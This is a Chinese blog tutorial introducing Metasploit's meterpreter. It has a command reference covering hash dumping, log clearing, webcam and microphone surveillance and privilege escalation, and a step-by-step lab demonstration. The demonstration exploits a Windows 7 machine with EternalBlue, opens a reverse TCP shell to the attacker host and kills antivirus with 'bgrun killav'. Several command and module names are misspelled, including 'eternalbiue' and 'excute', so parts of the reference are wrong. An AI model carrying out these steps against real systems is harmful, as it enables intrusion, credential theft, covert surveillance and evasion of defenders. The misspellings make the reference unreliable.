metasploit meterpreter介绍

meterpreter介绍

meterpreter是一个高级、动态、可扩展的payload

  • meterpreter上下文利用更多漏洞发起攻击
  • 后渗透测试阶段一站式操作界面

采用完全基于内存的DLL注入式payload

  • 注入到合法系统进程并建立stager
  • 基于stager上传和预加载DLL进行扩展模块的注入
  • 基于stager建立的socket连接建立加密的TLS/1.0通信隧道
  • 利用TLS隧道进一步加载后扩展模块(避免网络取证)0

meterpreter命令介绍

help                               查看帮助信息

background                   退出当前会话

run                                 运行一个meterpreter脚本或者post模块(目标主机屏幕会显示)

bgrun                             在后台运行一个meterpreter脚本或者post模块

cd                                  切换目录

ls                                   列出当前目录所含文件及子目录   

dir                                  列出当前目录所含文件及子目录  

pwd                               查看当前所在目录

cat                                 查看文件具体内容

扫描二维码关注公众号,回复: 11246755 查看本文章

mkdir                             新建文件夹

mv                                 移动文件或文件夹

rm                                  删除文件

rmdir                              删除文件夹

edit                                编辑文件

lpwd                              查看kali当前所在目录

lcd                                 切换kali本机目录

clearev                           清除靶机日志

download                       从靶机上下载文件到本机

upload                           上传文件到靶机

excute                            使用命令让靶机运行软件

getuid                             查看uid

getsystem                      获得system权限

getprivs                          查看自己当前的权限

getproxy                         查看浏览器代理

getpid                            查看meterpreter注入操作系统进程的pid

migrate                          更改注入的pid

hashdump                     以hash的形式展示密码

sysinfo                           查看系统基本信息

ps                                  查看系统进程

kill                                  结束进程    

reboot                            重新启动靶机

shutdown                       关闭靶机

shell                               获取靶机shell

show_mount                  查看靶机磁盘基本信息

search                            在靶机上搜索指定文件

arp                                 查看arp列表

netstat                           查看靶机网络连接情况

ipconfig                          查看靶机IP地址

ifconfig                           查看靶机IP地址

route                              查看靶机路由表

idletime                          查看目标操作系统空闲时间

resource                        执行含有meterpreter命令的文件

record_mic                    记录靶机麦克风的声音

webcam_list                   列出靶机摄像头列表

wecam_chat                  开启靶机摄像头,在kali开始监视端   

流程需求

  • kali攻击机          192.168.3.26
  • windows7 靶机  192.168.3.28

实例演示-利用meterpreter入侵系统

1.利用ms17_010(永恒之蓝)入侵windows7靶机。

use exploit/windows/smb/ms17_010_eternalbiue

2.设置靶机IP地址

set rhost 192.168.3.28

3.使用 meterpreter反向tcp连接payload。

set payload windows/meterpreter/reverse_tcp

4.设置回连IP地址

set  lhost 192.168.3.26

5.执行命令,开始入侵。

run

实例演示-bgrun命令运用

1.当获得meterpreter时,输入bgrun,按回车键,然后就可以看到可执行的模块。

2.比如运行关闭杀毒软件,有利于我们对靶机进一步控制。

bgrun killav

python扩展

1.meterpreter还支持python扩展,首先我们安装python。

load  python

2.安装成功后我们运行"help"命令,可以在最后面看到关于python的用法

到此就完成了meterpreter的命令以及用法介绍,如果想了解更多的Kali工具,请关注我!

猜你喜欢

转载自blog.csdn.net/smli_ng/article/details/106222987